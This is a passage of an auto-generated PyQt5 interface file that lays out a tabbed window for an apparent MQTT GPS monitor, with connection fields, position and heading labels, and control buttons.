"text": "# -*- coding: utf-8 -*-\r\n\r\n# Form implementation generated from reading ui file 'mainwindow.ui'\r\n#\r\n# Created by: PyQt5 UI code generator 5.12.1\r\n#\r\n# WARNING! All changes made in this file will be lost!\r\n\r\nfrom PyQt5 import QtCore, QtGui, QtWidgets\r\n\r\n\r\nclass Ui_MainWindow(object):\r\n def setupUi(self, MainWindow):\r\n MainWindow.setObjectName(\"MainWindow\")\r\n MainWindow.resize(1120, 710)\r\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(MainWindow.sizePolicy().hasHeightForWidth())\r\n MainWindow.setSizePolicy(sizePolicy)\r\n MainWindow.setMinimumSize(QtCore.QSize(1120, 710))\r\n MainWindow.setAutoFillBackground(False)\r\n MainWindow.setStyleSheet(\"\")\r\n self.centralWidget = QtWidgets.QWidget(MainWindow)\r\n self.centralWidget.setObjectName(\"centralWidget\")\r\n self.tabWidget = QtWidgets.QTabWidget(self.centralWidget)\r\n self.tabWidget.setGeometry(QtCore.QRect(0, 0, 1131, 711))\r\n self.tabWidget.setMinimumSize(QtCore.QSize(0, 0))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(10)\r\n self.tabWidget.setFont(font)\r\n self.tabWidget.setIconSize(QtCore.QSize(16, 16))\r\n self.tabWidget.setMovable(True)\r\n self.tabWidget.setObjectName(\"tabWidget\")\r\n self.tab_3 = QtWidgets.QWidget()\r\n self.tab_3.setObjectName(\"tab_3\")\r\n self.horizontalLayoutWidget_4 = QtWidgets.QWidget(self.tab_3)\r\n self.horizontalLayoutWidget_4.setGeometry(QtCore.QRect(250, 390, 621, 52))\r\n self.horizontalLayoutWidget_4.setObjectName(\"horizontalLayoutWidget_4\")\r\n self.horizontalLayout_7 = QtWidgets.QHBoxLayout(self.horizontalLayoutWidget_4)\r\n self.horizontalLayout_7.setContentsMargins(11, 11, 11, 11)\r\n self.horizontalLayout_7.setSpacing(6)\r\n self.horizontalLayout_7.setObjectName(\"horizontalLayout_7\")\r\n self.label_11 = QtWidgets.QLabel(self.horizontalLayoutWidget_4)\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(12)\r\n self.label_11.setFont(font)\r\n self.label_11.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_11.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_11.setObjectName(\"label_11\")\r\n self.horizontalLayout_7.addWidget(self.label_11)\r\n self.lineEdit_topic = QtWidgets.QLineEdit(self.horizontalLayoutWidget_4)\r\n self.lineEdit_topic.setMinimumSize(QtCore.QSize(0, 30))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(10)\r\n self.lineEdit_topic.setFont(font)\r\n self.lineEdit_topic.setObjectName(\"lineEdit_topic\")\r\n self.horizontalLayout_7.addWidget(self.lineEdit_topic)\r\n self.pushButton_submit = QtWidgets.QPushButton(self.horizontalLayoutWidget_4)\r\n self.pushButton_submit.setMinimumSize(QtCore.QSize(0, 35))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(12)\r\n self.pushButton_submit.setFont(font)\r\n self.pushButton_submit.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\r\n self.pushButton_submit.setObjectName(\"pushButton_submit\")\r\n self.horizontalLayout_7.addWidget(self.pushButton_submit)\r\n self.horizontalLayoutWidget_5 = QtWidgets.QWidget(self.tab_3)\r\n self.horizontalLayoutWidget_5.setGeometry(QtCore.QRect(250, 110, 621, 80))\r\n self.horizontalLayoutWidget_5.setObjectName(\"horizontalLayoutWidget_5\")\r\n self.horizontalLayout_8 = QtWidgets.QHBoxLayout(self.horizontalLayoutWidget_5)\r\n self.horizontalLayout_8.setContentsMargins(11, 11, 11, 11)\r\n self.horizontalLayout_8.setSpacing(6)\r\n self.horizontalLayout_8.setObjectName(\"horizontalLayout_8\")\r\n self.label_12 = QtWidgets.QLabel(self.horizontalLayoutWidget_5)\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(12)\r\n self.label_12.setFont(font)\r\n self.label_12.setObjectName(\"label_12\")\r\n self.horizontalLayout_8.addWidget(self.label_12)\r\n self.lineEdit_host = QtWidgets.QLineEdit(self.horizontalLayoutWidget_5)\r\n self.lineEdit_host.setMinimumSize(QtCore.QSize(0, 30))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(10)\r\n self.lineEdit_host.setFont(font)\r\n self.lineEdit_host.setAlignment(QtCore.Qt.AlignCenter)\r\n self.lineEdit_host.setObjectName(\"lineEdit_host\")\r\n self.horizontalLayout_8.addWidget(self.lineEdit_host)\r\n spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\r\n self.horizontalLayout_8.addItem(spacerItem)\r\n self.label_13 = QtWidgets.QLabel(self.horizontalLayoutWidget_5)\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(12)\r\n self.label_13.setFont(font)\r\n self.label_13.setObjectName(\"label_13\")\r\n self.horizontalLayout_8.addWidget(self.label_13)\r\n self.lineEdit_port = QtWidgets.QLineEdit(self.horizontalLayoutWidget_5)\r\n self.lineEdit_port.setMinimumSize(QtCore.QSize(0, 30))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(10)\r\n self.lineEdit_port.setFont(font)\r\n self.lineEdit_port.setAlignment(QtCore.Qt.AlignCenter)\r\n self.lineEdit_port.setObjectName(\"lineEdit_port\")\r\n self.horizontalLayout_8.addWidget(self.lineEdit_port)\r\n self.horizontalLayoutWidget_6 = QtWidgets.QWidget(self.tab_3)\r\n self.horizontalLayoutWidget_6.setGeometry(QtCore.QRect(250, 200, 621, 80))\r\n self.horizontalLayoutWidget_6.setObjectName(\"horizontalLayoutWidget_6\")\r\n self.horizontalLayout_9 = QtWidgets.QHBoxLayout(self.horizontalLayoutWidget_6)\r\n self.horizontalLayout_9.setContentsMargins(11, 11, 11, 11)\r\n self.horizontalLayout_9.setSpacing(6)\r\n self.horizontalLayout_9.setObjectName(\"horizontalLayout_9\")\r\n self.label_14 = QtWidgets.QLabel(self.horizontalLayoutWidget_6)\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(12)\r\n self.label_14.setFont(font)\r\n self.label_14.setObjectName(\"label_14\")\r\n self.horizontalLayout_9.addWidget(self.label_14)\r\n self.lineEdit_username = QtWidgets.QLineEdit(self.horizontalLayoutWidget_6)\r\n self.lineEdit_username.setMinimumSize(QtCore.QSize(0, 30))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(10)\r\n self.lineEdit_username.setFont(font)\r\n self.lineEdit_username.setAlignment(QtCore.Qt.AlignCenter)\r\n self.lineEdit_username.setObjectName(\"lineEdit_username\")\r\n self.horizontalLayout_9.addWidget(self.lineEdit_username)\r\n spacerItem1 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\r\n self.horizontalLayout_9.addItem(spacerItem1)\r\n self.label_15 = QtWidgets.QLabel(self.horizontalLayoutWidget_6)\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(12)\r\n self.label_15.setFont(font)\r\n self.label_15.setObjectName(\"label_15\")\r\n self.horizontalLayout_9.addWidget(self.label_15)\r\n self.lineEdit_password = QtWidgets.QLineEdit(self.horizontalLayoutWidget_6)\r\n self.lineEdit_password.setMinimumSize(QtCore.QSize(0, 30))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(10)\r\n self.lineEdit_password.setFont(font)\r\n self.lineEdit_password.setAlignment(QtCore.Qt.AlignCenter)\r\n self.lineEdit_password.setObjectName(\"lineEdit_password\")\r\n self.horizontalLayout_9.addWidget(self.lineEdit_password)\r\n self.horizontalLayoutWidget_7 = QtWidgets.QWidget(self.tab_3)\r\n self.horizontalLayoutWidget_7.setGeometry(QtCore.QRect(250, 290, 621, 80))\r\n self.horizontalLayoutWidget_7.setObjectName(\"horizontalLayoutWidget_7\")\r\n self.horizontalLayout_10 = QtWidgets.QHBoxLayout(self.horizontalLayoutWidget_7)\r\n self.horizontalLayout_10.setContentsMargins(11, 11, 11, 11)\r\n self.horizontalLayout_10.setSpacing(6)\r\n self.horizontalLayout_10.setObjectName(\"horizontalLayout_10\")\r\n self.label_16 = QtWidgets.QLabel(self.horizontalLayoutWidget_7)\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(12)\r\n self.label_16.setFont(font)\r\n self.label_16.setObjectName(\"label_16\")\r\n self.horizontalLayout_10.addWidget(self.label_16)\r\n self.lineEdit_clientid = QtWidgets.QLineEdit(self.horizontalLayoutWidget_7)\r\n self.lineEdit_clientid.setMinimumSize(QtCore.QSize(0, 30))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(10)\r\n self.lineEdit_clientid.setFont(font)\r\n self.lineEdit_clientid.setAlignment(QtCore.Qt.AlignCenter)\r\n self.lineEdit_clientid.setObjectName(\"lineEdit_clientid\")\r\n self.horizontalLayout_10.addWidget(self.lineEdit_clientid)\r\n spacerItem2 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\r\n self.horizontalLayout_10.addItem(spacerItem2)\r\n self.label_17 = QtWidgets.QLabel(self.horizontalLayoutWidget_7)\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(12)\r\n self.label_17.setFont(font)\r\n self.label_17.setObjectName(\"label_17\")\r\n self.horizontalLayout_10.addWidget(self.label_17)\r\n self.lineEdit_heartbeat = QtWidgets.QLineEdit(self.horizontalLayoutWidget_7)\r\n self.lineEdit_heartbeat.setMinimumSize(QtCore.QSize(0, 30))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(10)\r\n self.lineEdit_heartbeat.setFont(font)\r\n self.lineEdit_heartbeat.setAlignment(QtCore.Qt.AlignCenter)\r\n self.lineEdit_heartbeat.setObjectName(\"lineEdit_heartbeat\")\r\n self.horizontalLayout_10.addWidget(self.lineEdit_heartbeat)\r\n self.tabWidget.addTab(self.tab_3, \"\")\r\n self.tab = QtWidgets.QWidget()\r\n self.tab.setObjectName(\"tab\")\r\n self.horizontalLayoutWidget_2 = QtWidgets.QWidget(self.tab)\r\n self.horizontalLayoutWidget_2.setGeometry(QtCore.QRect(10, 5, 601, 52))\r\n self.horizontalLayoutWidget_2.setObjectName(\"horizontalLayoutWidget_2\")\r\n self.horizontalLayout_4 = QtWidgets.QHBoxLayout(self.horizontalLayoutWidget_2)\r\n self.horizontalLayout_4.setContentsMargins(11, 11, 11, 11)\r\n self.horizontalLayout_4.setSpacing(6)\r\n self.horizontalLayout_4.setObjectName(\"horizontalLayout_4\")\r\n self.label_10 = QtWidgets.QLabel(self.horizontalLayoutWidget_2)\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(10)\r\n self.label_10.setFont(font)\r\n self.label_10.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_10.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_10.setObjectName(\"label_10\")\r\n self.horizontalLayout_4.addWidget(self.label_10)\r\n self.lineEdit_topic_rec = QtWidgets.QLineEdit(self.horizontalLayoutWidget_2)\r\n self.lineEdit_topic_rec.setMinimumSize(QtCore.QSize(0, 25))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(10)\r\n self.lineEdit_topic_rec.setFont(font)\r\n self.lineEdit_topic_rec.setText(\"\")\r\n self.lineEdit_topic_rec.setObjectName(\"lineEdit_topic_rec\")\r\n self.horizontalLayout_4.addWidget(self.lineEdit_topic_rec)\r\n self.label_img = QtWidgets.QLabel(self.tab)\r\n self.label_img.setGeometry(QtCore.QRect(10, 50, 600, 600))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(10)\r\n self.label_img.setFont(font)\r\n self.label_img.setAutoFillBackground(False)\r\n self.label_img.setFrameShape(QtWidgets.QFrame.WinPanel)\r\n self.label_img.setFrameShadow(QtWidgets.QFrame.Plain)\r\n self.label_img.setLineWidth(3)\r\n self.label_img.setMidLineWidth(0)\r\n self.label_img.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_img.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_img.setObjectName(\"label_img\")\r\n self.horizontalLayoutWidget = QtWidgets.QWidget(self.tab)\r\n self.horizontalLayoutWidget.setGeometry(QtCore.QRect(630, 50, 370, 381))\r\n self.horizontalLayoutWidget.setObjectName(\"horizontalLayoutWidget\")\r\n self.horizontalLayout_3 = QtWidgets.QHBoxLayout(self.horizontalLayoutWidget)\r\n self.horizontalLayout_3.setContentsMargins(11, 11, 11, 11)\r\n self.horizontalLayout_3.setSpacing(6)\r\n self.horizontalLayout_3.setObjectName(\"horizontalLayout_3\")\r\n self.verticalLayout = QtWidgets.QVBoxLayout()\r\n self.verticalLayout.setSpacing(6)\r\n self.verticalLayout.setObjectName(\"verticalLayout\")\r\n self.label = QtWidgets.QLabel(self.horizontalLayoutWidget)\r\n self.label.setMinimumSize(QtCore.QSize(0, 30))\r\n font = QtGui.QFont()\r\n font.setFamily(\"华文行楷\")\r\n font.setPointSize(14)\r\n self.label.setFont(font)\r\n self.label.setStyleSheet(\"color: rgb(27, 27, 83);\")\r\n self.label.setObjectName(\"label\")\r\n self.verticalLayout.addWidget(self.label)\r\n self.label_2 = QtWidgets.QLabel(self.horizontalLayoutWidget)\r\n self.label_2.setMinimumSize(QtCore.QSize(0, 30))\r\n font = QtGui.QFont()\r\n font.setFamily(\"华文行楷\")\r\n font.setPointSize(14)\r\n self.label_2.setFont(font)\r\n self.label_2.setStyleSheet(\"color: rgb(27, 27, 83);\")\r\n self.label_2.setObjectName(\"label_2\")\r\n self.verticalLayout.addWidget(self.label_2)\r\n self.label_3 = QtWidgets.QLabel(self.horizontalLayoutWidget)\r\n self.label_3.setMinimumSize(QtCore.QSize(0, 30))\r\n font = QtGui.QFont()\r\n font.setFamily(\"华文行楷\")\r\n font.setPointSize(14)\r\n self.label_3.setFont(font)\r\n self.label_3.setStyleSheet(\"color: rgb(27, 27, 83);\")\r\n self.label_3.setObjectName(\"label_3\")\r\n self.verticalLayout.addWidget(self.label_3)\r\n self.label_4 = QtWidgets.QLabel(self.horizontalLayoutWidget)\r\n self.label_4.setMinimumSize(QtCore.QSize(0, 30))\r\n font = QtGui.QFont()\r\n font.setFamily(\"华文行楷\")\r\n font.setPointSize(14)\r\n self.label_4.setFont(font)\r\n self.label_4.setStyleSheet(\"color: rgb(27, 27, 83);\")\r\n self.label_4.setObjectName(\"label_4\")\r\n self.verticalLayout.addWidget(self.label_4)\r\n self.label_5 = QtWidgets.QLabel(self.horizontalLayoutWidget)\r\n self.label_5.setMinimumSize(QtCore.QSize(0, 30))\r\n font = QtGui.QFont()\r\n font.setFamily(\"华文行楷\")\r\n font.setPointSize(14)\r\n self.label_5.setFont(font)\r\n self.label_5.setStyleSheet(\"color: rgb(27, 27, 83);\")\r\n self.label_5.setObjectName(\"label_5\")\r\n self.verticalLayout.addWidget(self.label_5)\r\n self.label_6 = QtWidgets.QLabel(self.horizontalLayoutWidget)\r\n self.label_6.setMinimumSize(QtCore.QSize(0, 30))\r\n font = QtGui.QFont()\r\n font.setFamily(\"华文行楷\")\r\n font.setPointSize(14)\r\n self.label_6.setFont(font)\r\n self.label_6.setStyleSheet(\"color: rgb(27, 27, 83);\")\r\n self.label_6.setObjectName(\"label_6\")\r\n self.verticalLayout.addWidget(self.label_6)\r\n self.label_7 = QtWidgets.QLabel(self.horizontalLayoutWidget)\r\n self.label_7.setMinimumSize(QtCore.QSize(0, 30))\r\n font = QtGui.QFont()\r\n font.setFamily(\"华文行楷\")\r\n font.setPointSize(14)\r\n self.label_7.setFont(font)\r\n self.label_7.setStyleSheet(\"color: rgb(27, 27, 83);\")\r\n self.label_7.setObjectName(\"label_7\")\r\n self.verticalLayout.addWidget(self.label_7)\r\n self.label_8 = QtWidgets.QLabel(self.horizontalLayoutWidget)\r\n self.label_8.setMinimumSize(QtCore.QSize(0, 30))\r\n font = QtGui.QFont()\r\n font.setFamily(\"华文行楷\")\r\n font.setPointSize(14)\r\n self.label_8.setFont(font)\r\n self.label_8.setStyleSheet(\"color: rgb(27, 27, 83);\")\r\n self.label_8.setObjectName(\"label_8\")\r\n self.verticalLayout.addWidget(self.label_8)\r\n self.label_9 = QtWidgets.QLabel(self.horizontalLayoutWidget)\r\n self.label_9.setMinimumSize(QtCore.QSize(0, 30))\r\n font = QtGui.QFont()\r\n font.setFamily(\"华文行楷\")\r\n font.setPointSize(14)\r\n self.label_9.setFont(font)\r\n self.label_9.setStyleSheet(\"color: rgb(27, 27, 83);\")\r\n self.label_9.setObjectName(\"label_9\")\r\n self.verticalLayout.addWidget(self.label_9)\r\n self.horizontalLayout_3.addLayout(self.verticalLayout)\r\n self.verticalLayout_2 = QtWidgets.QVBoxLayout()\r\n self.verticalLayout_2.setContentsMargins(0, -1, -1, -1)\r\n self.verticalLayout_2.setSpacing(6)\r\n self.verticalLayout_2.setObjectName(\"verticalLayout_2\")\r\n self.label_status = QtWidgets.QLabel(self.horizontalLayoutWidget)\r\n self.label_status.setMinimumSize(QtCore.QSize(0, 30))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(12)\r\n font.setBold(False)\r\n font.setItalic(False)\r\n font.setWeight(50)\r\n self.label_status.setFont(font)\r\n self.label_status.setFrameShape(QtWidgets.QFrame.NoFrame)\r\n self.label_status.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_status.setScaledContents(False)\r\n self.label_status.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_status.setObjectName(\"label_status\")\r\n self.verticalLayout_2.addWidget(self.label_status)\r\n self.label_mode = QtWidgets.QLabel(self.horizontalLayoutWidget)\r\n self.label_mode.setMinimumSize(QtCore.QSize(0, 30))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(12)\r\n font.setBold(False)\r\n font.setItalic(False)\r\n font.setWeight(50)\r\n self.label_mode.setFont(font)\r\n self.label_mode.setFrameShape(QtWidgets.QFrame.NoFrame)\r\n self.label_mode.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_mode.setScaledContents(False)\r\n self.label_mode.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_mode.setObjectName(\"label_mode\")\r\n self.verticalLayout_2.addWidget(self.label_mode)\r\n self.label_time = QtWidgets.QLabel(self.horizontalLayoutWidget)\r\n self.label_time.setMinimumSize(QtCore.QSize(0, 30))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(12)\r\n font.setBold(False)\r\n font.setItalic(False)\r\n font.setWeight(50)\r\n self.label_time.setFont(font)\r\n self.label_time.setFrameShape(QtWidgets.QFrame.NoFrame)\r\n self.label_time.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_time.setScaledContents(False)\r\n self.label_time.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_time.setObjectName(\"label_time\")\r\n self.verticalLayout_2.addWidget(self.label_time)\r\n self.label_lat = QtWidgets.QLabel(self.horizontalLayoutWidget)\r\n self.label_lat.setMinimumSize(QtCore.QSize(0, 30))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(12)\r\n font.setBold(False)\r\n font.setItalic(False)\r\n font.setWeight(50)\r\n self.label_lat.setFont(font)\r\n self.label_lat.setFrameShape(QtWidgets.QFrame.NoFrame)\r\n self.label_lat.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_lat.setScaledContents(False)\r\n self.label_lat.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_lat.setObjectName(\"label_lat\")\r\n self.verticalLayout_2.addWidget(self.label_lat)\r\n self.label_lon = QtWidgets.QLabel(self.horizontalLayoutWidget)\r\n self.label_lon.setMinimumSize(QtCore.QSize(0, 30))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(12)\r\n font.setBold(False)\r\n font.setItalic(False)\r\n font.setWeight(50)\r\n self.label_lon.setFont(font)\r\n self.label_lon.setFrameShape(QtWidgets.QFrame.NoFrame)\r\n self.label_lon.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_lon.setScaledContents(False)\r\n self.label_lon.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_lon.setObjectName(\"label_lon\")\r\n self.verticalLayout_2.addWidget(self.label_lon)\r\n self.label_speed = QtWidgets.QLabel(self.horizontalLayoutWidget)\r\n self.label_speed.setMinimumSize(QtCore.QSize(0, 30))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(12)\r\n font.setBold(False)\r\n font.setItalic(False)\r\n font.setWeight(50)\r\n self.label_speed.setFont(font)\r\n self.label_speed.setFrameShape(QtWidgets.QFrame.NoFrame)\r\n self.label_speed.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_speed.setScaledContents(False)\r\n self.label_speed.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_speed.setObjectName(\"label_speed\")\r\n self.verticalLayout_2.addWidget(self.label_speed)\r\n self.label_course = QtWidgets.QLabel(self.horizontalLayoutWidget)\r\n self.label_course.setMinimumSize(QtCore.QSize(0, 30))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(12)\r\n font.setBold(False)\r\n font.setItalic(False)\r\n font.setWeight(50)\r\n self.label_course.setFont(font)\r\n self.label_course.setFrameShape(QtWidgets.QFrame.NoFrame)\r\n self.label_course.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_course.setScaledContents(False)\r\n self.label_course.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_course.setObjectName(\"label_course\")\r\n self.verticalLayout_2.addWidget(self.label_course)\r\n self.label_declination = QtWidgets.QLabel(self.horizontalLayoutWidget)\r\n self.label_declination.setMinimumSize(QtCore.QSize(0, 30))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(12)\r\n font.setBold(False)\r\n font.setItalic(False)\r\n font.setWeight(50)\r\n self.label_declination.setFont(font)\r\n self.label_declination.setFrameShape(QtWidgets.QFrame.NoFrame)\r\n self.label_declination.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_declination.setScaledContents(False)\r\n self.label_declination.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_declination.setObjectName(\"label_declination\")\r\n self.verticalLayout_2.addWidget(self.label_declination)\r\n self.label_declination_dir = QtWidgets.QLabel(self.horizontalLayoutWidget)\r\n self.label_declination_dir.setMinimumSize(QtCore.QSize(0, 30))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(12)\r\n font.setBold(False)\r\n font.setItalic(False)\r\n font.setWeight(50)\r\n self.label_declination_dir.setFont(font)\r\n self.label_declination_dir.setFrameShape(QtWidgets.QFrame.NoFrame)\r\n self.label_declination_dir.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_declination_dir.setScaledContents(False)\r\n self.label_declination_dir.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_declination_dir.setObjectName(\"label_declination_dir\")\r\n self.verticalLayout_2.addWidget(self.label_declination_dir)\r\n self.horizontalLayout_3.addLayout(self.verticalLayout_2)\r\n self.horizontalLayout_3.setStretch(1, 1)\r\n self.pushButton_reset = QtWidgets.QPushButton(self.tab)\r\n self.pushButton_reset.setGeometry(QtCore.QRect(1010, 250, 91, 51))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(12)\r\n self.pushButton_reset.setFont(font)\r\n self.pushButton_reset.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\r\n self.pushButton_reset.setObjectName(\"pushButton_reset\")\r\n self.pushButton_start = QtWidgets.QPushButton(self.tab)\r\n self.pushButton_start.setGeometry(QtCore.QRect(1010, 90, 91, 51))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(12)\r\n self.pushButton_start.setFont(font)\r\n self.pushButton_start.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\r\n self.pushButton_start.setObjectName(\"pushButton_start\")\r\n self.pushButton_stop = QtWidgets.QPushButton(self.tab)\r\n self.pushButton_stop.setGeometry(QtCore.QRect(1010, 170, 91, 51))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(12)\r\n self.pushButton_stop.setFont(font)\r\n self.pushButton_stop.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\r\n self.pushButton_stop.setObjectName(\"pushButton_stop\")\r\n self.horizontalLayoutWidget_3 = QtWidgets.QWidget(self.tab)\r\n self.horizontalLayoutWidget_3.setGeometry(QtCore.QRect(630, 440, 471, 211))\r\n self.horizontalLayoutWidget_3.setObjectName(\"horizontalLayoutWidget_3\")\r\n self.horizontalLayout_5 = QtWidgets.QHBoxLayout(self.horizontalLayoutWidget_3)\r\n self.horizontalLayout_5.setSizeConstraint(QtWidgets.QLayout.SetDefaultConstraint)\r\n self.horizontalLayout_5.setContentsMargins(11, 11, 11, 11)\r\n self.horizontalLayout_5.setSpacing(6)\r\n self.horizontalLayout_5.setObjectName(\"horizontalLayout_5\")\r\n self.label_debug = QtWidgets.QLabel(self.horizontalLayoutWidget_3)\r\n self.label_debug.setAutoFillBackground(False)\r\n self.label_debug.setStyleSheet(\"color: rgb(170, 85, 0);\")\r\n self.label_debug.setFrameShape(QtWidgets.QFrame.Box)\r\n self.label_debug.setFrameShadow(QtWidgets.QFrame.Sunken)\r\n self.label_debug.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_debug.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignTop)\r\n self.label_debug.setWordWrap(False)\r\n self.label_debug.setObjectName(\"label_debug\")\r\n self.horizontalLayout_5.addWidget(self.label_debug)\r\n spacerItem3 = QtWidgets.QSpacerItem(10, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\r\n self.horizontalLayout_5.addItem(spacerItem3)\r\n self.pushButton_clear = QtWidgets.QPushButton(self.horizontalLayoutWidget_3)\r\n self.pushButton_clear.setMinimumSize(QtCore.QSize(0, 50))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Times New Roman\")\r\n font.setPointSize(12)\r\n self.pushButton_clear.setFont(font)\r\n self.pushButton_clear.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\r\n self.pushButton_clear.setObjectName(\"pushButton_clear\")\r\n self.horizontalLayout_5.addWidget(self.pushButton_clear)\r\n self.horizontalLayout_5.setStretch(0, 2)\r\n self.label_gpsupdate = QtWidgets.QLabel(self.tab)\r\n self.label_gpsupdate.setGeometry(QtCore.QRect(1013, 340, 81, 41))\r\n font = QtGui.QFont()\r\n font.setFamily(\"隶书\")\r\n font.setPointSize(12)\r\n self.label_gpsupdate.setFont(font)\r\n self.label_gpsupdate.setStyleSheet(\"\")\r\n self.label_gpsupdate.setFrameShape(QtWidgets.QFrame.NoFrame)\r\n self.label_gpsupdate.setFrameShadow(QtWidgets.QFrame.Plain)\r\n self.label_gpsupdate.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_gpsupdate.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_gpsupdate.setObjectName(\"label_gpsupdate\")\r\n self.tabWidget.addTab(self.tab, \"\")\r\n self.tab_4 = QtWidgets.QWidget()\r\n self.tab_4.setObjectName(\"tab_4\")\r\n self.widget = QtWidgets.QWidget(self.tab_4)\r\n self.widget.setGeometry(QtCore.QRect(90, 60, 380, 261))\r\n self.widget.setStyleSheet(\"background-color: rgb(245, 255, 180);\")\r\n self.widget.setObjectName(\"widget\")\r\n self.horizontalLayoutWidget_8 = QtWidgets.QWidget(self.widget)\r\n self.horizontalLayoutWidget_8.setGeometry(QtCore.QRect(10, 40, 361, 221))\r\n self.horizontalLayoutWidget_8.setObjectName(\"horizontalLayoutWidget_8\")\r\n self.horizontalLayout = QtWidgets.QHBoxLayout(self.horizontalLayoutWidget_8)\r\n self.horizontalLayout.setContentsMargins(11, 11, 11, 11)\r\n self.horizontalLayout.setSpacing(6)\r\n self.horizontalLayout.setObjectName(\"horizontalLayout\")\r\n self.verticalLayout_3 = QtWidgets.QVBoxLayout()\r\n self.verticalLayout_3.setSpacing(6)\r\n self.verticalLayout_3.setObjectName(\"verticalLayout_3\")\r\n self.label_18 = QtWidgets.QLabel(self.horizontalLayoutWidget_8)\r\n font = QtGui.QFont()\r\n font.setFamily(\"华文楷体\")\r\n font.setPointSize(12)\r\n self.label_18.setFont(font)\r\n self.label_18.setStyleSheet(\"color: rgb(27, 27, 83);\")\r\n self.label_18.setFrameShape(QtWidgets.QFrame.NoFrame)\r\n self.label_18.setTextFormat(QtCore.Qt.PlainText)\r\n self.label_18.setAlignment(QtCore.Qt.AlignCenter)\r\n 